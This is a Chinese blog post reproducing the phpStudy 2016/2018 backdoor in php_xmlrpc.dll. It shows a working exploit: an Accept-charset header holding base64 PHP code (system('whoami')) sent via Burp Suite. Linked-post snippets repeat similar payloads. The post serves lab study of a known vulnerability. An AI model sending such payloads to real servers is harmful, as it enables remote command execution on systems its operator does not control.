phpstudy后门漏洞复现

最新推荐文章于 2023-10-16 18:54:04 发布
最新推荐文章于 2023-10-16 18:54:04 发布
阅读量278 收藏 1
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46490129/article/details/111573938
版权
文章详细介绍了如何复现PHPStudy的高危后门漏洞,该漏洞允许攻击者执行PHP命令。主要涉及2016版和2018版的PHPStudy,包括php-5.2.17和php-5.4.45版本。复现过程包括访问phpinfo页面和使用BurpSuite工具。需要注意的是,官方已修复此问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

phpstudy后门漏洞复现##

漏洞危害
高危

漏洞描述
攻击者可以利用该漏洞执行php命令,也可以称作phpstudy后门

影响版本
phpstudy 2016版 php-5.4
phpstudy 2018版 php-5.2.17
phpstudy 2018版 php-5.4.45

工具准备

phpsudy2016 -phpstudy2018

brup

漏洞复现
访问phpinfo页面


使用brup 抓住当前页面包

放入 Repeater模块中

利用代码
Accept-charset: c3lzdGVtKCd3aG9hbWknKTs=
Accept-Encoding: gzip,deflate

在这里插入图片描述

复现注意
第一注意版本问题,在官网已经 没有存在后门的phpstudy

在这里插入图片描述

Accept-charset: c3lzdGVtKCd3aG9hbWknKTs= 这一行 代码 就是 base64 编码过后执行的 代码
如需要转载 请标明

记一次phpstudy后门漏洞复现
Animation77的博客
10-30 1661
通过查阅资料,后门代码存在于\ext\php_xmlrpc.dll模块中 phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45 phpStudy2016路径 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018路径 PHPTutorial\php...
phpStudy后门漏洞复现
LuckySec
08-20 6920
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。 影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45 更多漏洞细节
漏洞复现】之PhpStudy“后门”利用复现、修复及使用脚本快速复现(最全,转自https://www.cnblogs.com/yankaohaitaiwei/p/11604762.html)
qq_45290991的博客
10-07 1340
漏洞复现】之PhpStudy“后门”利用复现、修复及使用脚本快速复现 (本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦)   该复现参考网络中的文章,该漏洞复现仅仅是为了学习交流,严禁非法使用!!!    一、事件背景   北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后...
RCE漏洞:phpstudy漏洞复现
最新发布
一个努力学习网安的小牛马
10-16 599
phpstudy中存在一种RCE漏洞(Remote Code|Command Execute)由于程序中预留了执行代码或者命令的接口,并且提供了给用户使用的界面,导致被黑客利用, 控制服务器。
PhpStudy后门漏洞实战复现
la-大白
10-28 5011
phpstudy后门漏洞
漏洞复现phpstudy隐藏后门漏洞的验证与利用
kkza的博客
09-18 1613
1 背景 phpstudy是国内第一款php后端开发调试集成软件,其将php、apache、mysql、phpmyadmin等集成在一起一次性安装,使用者无需在配置上面花太多时间。 2019年杭州警方在净网2019行动后发布了phpstudy存在隐藏后门的漏洞 2影响版本 phpstudy2016 --php/php-5.2.17/ext/php_xmlrpc.dll --php/php-5.4.45/ext/php_xmlrpc.dll phpstudy2018 --PHPTutoria.
phpStudy backdoor 2019后门漏洞复现过程记录
牛奶栗的小博客
11-11 985
1)可以通过查看路径为PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll的文件,查找到@eval(%s('%s'));4、打开Burpsuite抓phpinfo.php页面的请求包,发送到Repeater重放器模块。部署在win10虚拟机里,解压后运行后访问localhost/phpinfo.php即成功安装。3)查看php.ini文件,检索到extension=php_xmlrpc.dll。2)查看php探针→PHP已编译模块检测,存在xmlrpc。
phpstudy php_xmlrpc.dll后门漏洞复现
https://www.cnblogs.com/zpchcbd/
09-26 7253
搭建环境: phpstudy2018 php版本5.4 漏洞影响版本:5.2/5.4 漏洞利用 1、随便访问一个存在的php文件 我这里就访问index.php好了 2、进行index.php 进行抓包 再自行添加两个字段payload 执行系统命令 Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw== Accept-Encoding: gzip,def...
Phpstudy后门漏洞复现
qq_56426046的博客
09-10 2824
2019年9月20日,网上传出phpStudy软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。
phpstudy后门复现
hackerie的博客
10-29 464
1.影响版本分布: phpStudy2016 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018 PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl...
phpStudy后门利用复现
qq_17754023的博客
12-01 566
1.phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP、MySQL、phpMyAdmin不同版本软件于一身,一次性安装无需配置即可直接使用,具有PHP环境调试和PHP开发功能。 2.后门事件 2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。通过专业技术溯源进行分析,查明了数据回传的信息种类、原理方法、存储位置,并聘请了第三
phpstudy后门利用复现
Sys1em32 安全之路
09-26 874
0x01.简介 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用。 0x02.漏洞描述 phpstudy近期被爆存在有人恶意植入后门,相关大佬已经被请去喝茶了。 后门存在路径: phpStudy2016和phpStudy2018自带的php...
phpstudy后门预警及漏洞复现
热门推荐
ranuy阮的博客
09-24 1万+
1.phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP、MySQL、phpMyAdmin不同版本软件于一身,一次性安装无需配置即可直接使用,具有PHP环境调试和PHP开发功能。 2.后门事件 2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量...
漏洞复现phpStudy 小皮 Windows面板 RCE漏洞
李火火的安全圈
02-09 5865
Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE。
PhpStudy2016-2018-RCE 漏洞复现
故事讲予风听
07-14 1547
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意的命令执行和操纵服务器文件系统。需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。通过利用该漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值